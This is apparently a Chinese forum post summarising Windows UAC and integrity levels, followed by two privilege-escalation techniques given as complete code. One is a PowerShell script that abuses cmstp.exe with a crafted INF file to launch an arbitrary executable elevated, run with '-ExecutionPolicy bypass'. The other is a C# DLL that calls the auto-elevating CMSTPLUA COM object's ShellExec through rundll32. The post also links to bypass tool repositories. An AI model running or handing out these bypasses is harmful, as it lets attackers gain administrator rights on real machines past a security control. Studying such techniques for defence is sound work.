UAC绕过学习-总结

Grav1ty

UAC绕过学习-总结


1、什么是uac？

[backcolor=rgba(255, 255, 255, 0.9)]UAC 用于允许管理员用户不对每个执行的进程授予管理员权限这是作为管理员UAC提升执行，如果成功完成，特权令牌用于创建进程。

[backcolor=rgba(255, 255, 255, 0.9)]这里为了区分低权限高权限的进程，微软使用了强制性完整性控制MIC

MIC介绍

[backcolor=rgba(255, 255, 255, 0.9)]查看自己当前的完整性级别

1. whoami /groups

复制代码

[backcolor=rgba(255, 255, 255, 0.9)]
接下来我们以该级别创建一个文件

现在我们以管理员cmd给予test.txt最高的系统权限

可以看见我们对该文件是有FULL权限的，但是由于mic完整性校验控制

我们当前是中 level 所以 对高level的不能完全控制
也就是这里说的
Therefore, when a file has a minimum integrity level, in order to modify it you need to be running at least in that integrity level.
那我们如果将cmd.exe 的完整性校验改为高 他会自动以高权限运行吗
如下

[backcolor=rgba(255, 255, 255, 0.9)]
这里我们就很明白了
Not all files and folders have a minimum integrity level, but all processes are running under an integrity level. And similar to what happened with the file-system, if a process wants to write inside another process it must have at least the same integrity level. This means that a process with low integrity level can’t open a handle with full access to a process with medium integrity level.

1. 并非所有文件和文件夹都具有最低完整性级别，但所有进程都在完整性级别下运行。与文件系统发生的情况类似，如果一个进程想要在另一个进程内部写入，它必须至少具有相同的完整性级别。这意味着具有低完整性级别的进程无法打开对具有中等完整性级别的进程具有完全访问权限的句柄。

复制代码

check list UAC

[backcolor=rgba(255, 255, 255, 0.9)]我们通过此条注册表查询UAC的情况 reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System 这里 EnableLUA 1为开启UAC 0为关闭UAC、

[backcolor=rgba(255, 255, 255, 0.9)]

[backcolor=rgba(255, 255, 255, 0.9)]此外还需要注意此项

[backcolor=rgba(255, 255, 255, 0.9)]ConsentPromptBehaviorAdmin

[backcolor=rgba(255, 255, 255, 0.9)]我们一般遇到2和5

1. 此外还需要注意
   
2. FilterAdministratorToken（这里解决了一直只知道uac不能普通管理员不能远程ipc执行命令 只有administrator可以的问题)

复制代码

[backcolor=rgba(255, 255, 255, 0.9)]

UAC-绕过手段

1、白名单机制bypassUAC 这里有狠多具体参考uacme这里我拿cmstp举例

[backcolor=rgba(255, 255, 255, 0.9)]参考代码

1. # UAC Bypass poc using SendKeys
   
2. # Version 1.0
   
3. # Author: Oddvar Moe
   
4. # Functions borrowed from: https://powershell.org/forums/topic/sendkeys/
   
5. # Todo: Hide window on screen for stealth
   
6. # Todo: Make script edit the INF file for command to inject...
   
7. 
   
8. 
   
9. Function script:Set-INFFile {
   
10. [CmdletBinding()]
    
11.   Param (
    
12.   [Parameter(HelpMessage="Specify the INF file location")]
    
13.   $InfFileLocation = "$env:temp\CMSTP.inf",
    
14.   
    
15.   [Parameter(HelpMessage="Specify the command to launch in a UAC-privileged window")]
    
16.   [String]$CommandToExecute = 'C:\Users\xxx\Desktop\uactest\artifact.exe'
    
17.   )
    
18. 
    
19. $InfContent = @"
    
20. [version]
    
21. Signature=`$chicago`$
    
22. AdvancedINF=2.5
    
23. 
    
24. [DefaultInstall]
    
25. CustomDestination=CustInstDestSectionAllUsers
    
26. RunPreSetupCommands=RunPreSetupCommandsSection
    
27. 
    
28. [RunPreSetupCommandsSection]
    
29. ; Commands Here will be run Before Setup Begins to install
    
30. $CommandToExecute
    
31. taskkill /IM cmstp.exe /F
    
32. 
    
33. [CustInstDestSectionAllUsers]
    
34. 49000,49001=AllUSer_LDIDSection, 7
    
35. 
    
36. [AllUSer_LDIDSection]
    
37. "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
    
38. 
    
39. [Strings]
    
40. ServiceName="CorpVPN"
    
41. ShortSvcName="CorpVPN"
    
42. 
    
43. "@
    
44. 
    
45. $InfContent | Out-File $InfFileLocation -Encoding ASCII
    
46. }
    
47. 
    
48. 
    
49. Function Get-Hwnd
    
50. {
    
51.   [CmdletBinding()]
    
52.    
    
53.   Param
    
54.   (
    
55.     [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName
    
56.   )
    
57.   Process
    
58.     {
    
59.         $ErrorActionPreference = 'Stop'
    
60.         Try
    
61.         {
    
62.             $hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle
    
63.         }
    
64.         Catch
    
65.         {
    
66.             $hwnd = $null
    
67.         }
    
68.         $hash = @{
    
69.         ProcessName = $ProcessName
    
70.         Hwnd        = $hwnd
    
71.         }
    
72.         
    
73.     New-Object -TypeName PsObject -Property $hash
    
74.     }
    
75. }
    
76. 
    
77. function Set-WindowActive
    
78. {
    
79.   [CmdletBinding()]
    
80. 
    
81.   Param
    
82.   (
    
83.     [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name
    
84.   )
    
85.   
    
86.   Process
    
87.   {
    
88.     $memberDefinition = @'
    
89.     [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
    
90.     [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);
    
91. 
    
92. '@
    
93. 
    
94.     Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32
    
95.     $hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd
    
96.     If ($hwnd)
    
97.     {
    
98.       $onTop = New-Object -TypeName System.IntPtr -ArgumentList (0)
    
99.       [User32.Api]::SetForegroundWindow($hwnd)
    
100.       [User32.Api]::ShowWindow($hwnd, 5)
     
101.     }
     
102.     Else
     
103.     {
     
104.       [string] $hwnd = 'N/A'
     
105.     }
     
106. 
     
107.     $hash = @{
     
108.       Process = $Name
     
109.       Hwnd    = $hwnd
     
110.     }
     
111.         
     
112.     New-Object -TypeName PsObject -Property $hash
     
113.   }
     
114. }
     
115. 
     
116. . Set-INFFile
     
117. #Needs Windows forms
     
118. add-type -AssemblyName System.Windows.Forms
     
119. If (Test-Path $InfFileLocation) {
     
120. #Command to run
     
121. $ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe"
     
122. $ps.Arguments = "/au $InfFileLocation"
     
123. $ps.UseShellExecute = $false
     
124. 
     
125. #Start it
     
126. [system.diagnostics.process]::Start($ps)
     
127. 
     
128. do
     
129. {
     
130.   # Do nothing until cmstp is an active window
     
131. }
     
132. until ((Set-WindowActive cmstp).Hwnd -ne 0)
     
133. 
     
134. 
     
135. #Activate window
     
136. Set-WindowActive cmstp
     
137. 
     
138. #Send the Enter key
     
139. [System.Windows.Forms.SendKeys]::SendWait("{ENTER}")
     
140. }

复制代码

然后运行

[backcolor=rgba(255, 255, 255, 0.9)]powershell -ExecutionPolicy bypass C:\Users\xxx\Desktop\uactest\usctest.ps1
powershell C:\Users\xxxx\Desktop\uactest\usctest.ps1

2、利用com组件提权
这里以ICMLuaUtil为例子
主要原理是
该方法原理在于调用COM组件中自动提权并且可以执行命令的接口。

1. using System;
   
2. using System.Runtime.CompilerServices;
   
3. using System.Runtime.InteropServices;
   
4. 
   
5. namespace UAC_comICM
   
6. {
   
7.     public class Class1
   
8.     {
   
9.         internal enum HRESULT : long
   
10.         {
    
11.             S_FALSE = 0x0001,
    
12.             S_OK = 0x0000,
    
13.             E_INVALIDARG = 0x80070057,
    
14.             E_OUTOFMEMORY = 0x8007000E
    
15.         }
    
16. 
    
17.         [StructLayout(LayoutKind.Sequential)]
    
18.         internal struct BIND_OPTS3
    
19.         {
    
20.             internal uint cbStruct;
    
21.             internal uint grfFlags;
    
22.             internal uint grfMode;
    
23.             internal uint dwTickCountDeadline;
    
24.             internal uint dwTrackFlags;
    
25.             internal uint dwClassContext;
    
26.             internal uint locale;
    
27.             object pServerInfo; // will be passing null, so type doesn't matter
    
28.             internal IntPtr hwnd;
    
29.         }
    
30. 
    
31.         [Flags]
    
32.         internal enum CLSCTX
    
33.         {
    
34.             CLSCTX_INPROC_SERVER = 0x1,
    
35.             CLSCTX_INPROC_HANDLER = 0x2,
    
36.             CLSCTX_LOCAL_SERVER = 0x4,
    
37.             CLSCTX_REMOTE_SERVER = 0x10,
    
38.             CLSCTX_NO_CODE_DOWNLOAD = 0x400,
    
39.             CLSCTX_NO_CUSTOM_MARSHAL = 0x1000,
    
40.             CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000,
    
41.             CLSCTX_NO_FAILURE_LOG = 0x4000,
    
42.             CLSCTX_DISABLE_AAA = 0x8000,
    
43.             CLSCTX_ENABLE_AAA = 0x10000,
    
44.             CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000,
    
45.             CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
    
46.             CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER,
    
47.             CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER
    
48.         }
    
49. 
    
50.         const ulong SEE_MASK_DEFAULT = 0x0;
    
51.         const ulong SW_SHOW = 0x5;
    
52. 
    
53.         [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
    
54.         [return: MarshalAs(UnmanagedType.Interface)]
    
55.         internal static extern object CoGetObject(
    
56.           string pszName,
    
57.           [In] ref BIND_OPTS3 pBindOptions,
    
58.           [In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);
    
59. 
    
60.         [DllExport]
    
61.         public static void BypassUAC()
    
62.         {
    
63.             Guid classId_cmstplua = new Guid("3E5FC7F9-9A51-4367-9063-A120244FBEC7");
    
64.             // Interface ID
    
65.             Guid interfaceId_icmluautil = new Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C");
    
66. 
    
67.             ICMLuaUtil icm = (ICMLuaUtil)LaunchElevatedCOMObject(classId_cmstplua, interfaceId_icmluautil); ;
    
68.             icm.ShellExec(@"cmd.exe", string.Format("/c {0}", "calc"), @"C:\windows\system32", SEE_MASK_DEFAULT, SW_SHOW);
    
69.             Marshal.ReleaseComObject(icm);
    
70.         }
    
71. 
    
72.         public static object LaunchElevatedCOMObject(Guid Clsid, Guid InterfaceID)
    
73.         {
    
74.             string CLSID = Clsid.ToString("B");
    
75.             string monikerName = "Elevation:Administrator!new:" + CLSID;
    
76. 
    
77.             BIND_OPTS3 bo = new BIND_OPTS3();
    
78.             bo.cbStruct = (uint)Marshal.SizeOf(bo);
    
79.             bo.hwnd = IntPtr.Zero;
    
80.             bo.dwClassContext = (int)CLSCTX.CLSCTX_LOCAL_SERVER;
    
81. 
    
82.             object retVal = CoGetObject(monikerName, ref bo, InterfaceID);
    
83. 
    
84.             return (retVal);
    
85.         }
    
86. 
    
87.         [ComImport, Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    
88.         interface ICMLuaUtil
    
89.         {
    
90.             //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
    
91.             //void QueryInterface([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid, [In, Out] ref IntPtr ppv);
    
92.             //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
    
93.             //void AddRef();
    
94.             //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
    
95.             //void Release();
    
96.             void Method1();
    
97.             void Method2();
    
98.             void Method3();
    
99.             void Method4();
    
100.             void Method5();
     
101.             void Method6();
     
102.             HRESULT ShellExec(
     
103.                 [In, MarshalAs(UnmanagedType.LPWStr)] string file,
     
104.                 [In, MarshalAs(UnmanagedType.LPWStr)] string paramaters,
     
105.                 [In, MarshalAs(UnmanagedType.LPWStr)] string directory,
     
106.                 [In] ulong fMask,
     
107.                 [In] ulong nShow);
     
108. 
     
109.             
     
110.         }
     
111.     }
     
112. }

复制代码

• 
  

这里由于必须使用rundll32.exe去拉取，不然会是系统不信任的进程 所以启动格式为rundll32.exe dll uac修改PEB结构，欺骗PSAPI，调用COM组件ICMLuaUtil.shellexec去执行

参考如下

https://github.com/0xlane/BypassUAC/blob/master/BypassUAC_csharp/PEBMasq.cs https://pingmaoer.github.io/2020 ... %E5%AD%A6%E4%B9%A0/ https://3gstudent.github.io/%E9% ... 6%E6%96%87%E4%BB%B6

[backcolor=rgba(255, 255, 255, 0.9)]好处就是不用调用rundll32.exe这种可信的文件
这里提供快速查找本机可利用com的手法
https://github.com/hfiref0x/UACM ... 6854/Source/Yuubari

这里使用之前提到的cmstplua进行搜索3e5fc7f9-9a51-4367-9063-a120244fbec7可以看到Autoelevated COM objects 组件CMSTPLUA的信息。通过这种方式，我们可以把当前系统所有支持auto-elevate的COM组件以及应用全部都列出来

1. 参考 https://cloud.tencent.com/developer/article/1623517 https://github.com/0xlane/BypassUAC/blob/master/BypassUAC_Dll_csharp/dllmain.cs https://pingmaoer.github.io/2020/07/09/BypassUAC%E6%96%B9%E6%B3%95%E8%AE%BA%E5%AD%A6%E4%B9%A0/

复制代码